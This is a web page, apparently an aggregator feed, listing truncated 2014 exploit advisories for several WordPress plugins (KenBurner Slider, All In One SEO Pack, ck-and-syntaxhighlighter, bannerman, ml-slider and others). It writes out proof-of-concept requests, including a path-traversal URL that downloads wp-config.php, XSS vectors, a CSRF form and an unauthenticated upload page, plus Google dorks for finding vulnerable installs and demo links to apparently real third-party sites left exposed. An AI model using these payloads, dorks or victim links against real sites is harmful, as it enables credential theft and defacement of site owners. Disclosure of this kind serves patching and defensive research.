WordPress KenBurner Slider Arbitrary File Download

26 August 2014 - Source: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The WordPress plugin called KenBurner Slider suffers from an Arbitrary File Download vulnerability.
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...


WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 August 2014 - Source: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...


WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 August 2014 - Source: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...


WordPress WhyDoWork AdSense 1.2 XSS / CSRF

4 August 2014 - Source: http://www.mondounix.com
###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 July 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 & earlier.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
 
Affected items - Affected files.

http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS CODE]

Proof of Concept (PoC):
Vector: "><svg/onload=alert(/Dylan/)>
 
Affected variable: $idx
Fix:...


WordPress Random Banner 1.1.2.1 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/random-banner/
 
# Software Link : http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<input placeholder="Link for that image" type="text" size="25" name="buffercode_RBanner_url_banner1" value="<?php echo get_option('buffercode_RBanner_url_banner1') ?>" />
 
 
######################
 
Exploit...


WordPress Custom Banners 1.2.2.2 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<table class="form-table">
  <tr valign="top">
    <th scope="row"><label for="custom_banners_registered_name">Email Address</label></th>
    <td><input type="text" name="custom_banners_registered_name"...


WordPress Bannerman 0.2.4 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
 
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
 
######################
 
Exploit Code:
 
<html>
<body>
<form name="post_form" action="http://localhost/wp-admin/options-general.php?page=bannerman" method="post">
<input type='hidden' name="bannerman_background"...


WordPress ml-slider 2.5 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/ml-slider
 
# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]
 
 
# Exploit:  
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>
 
#####################
 
Discovered By : ACC3SS
 
#####################


...


WordPress Simple Share Buttons Adder 4.4 CSRF / XSS

1 July 2014 - Source: http://www.mondounix.com
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
 
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
 
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary JavaScript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
 
 
Proof of concept
================
If a logged-in administrator user clicks...
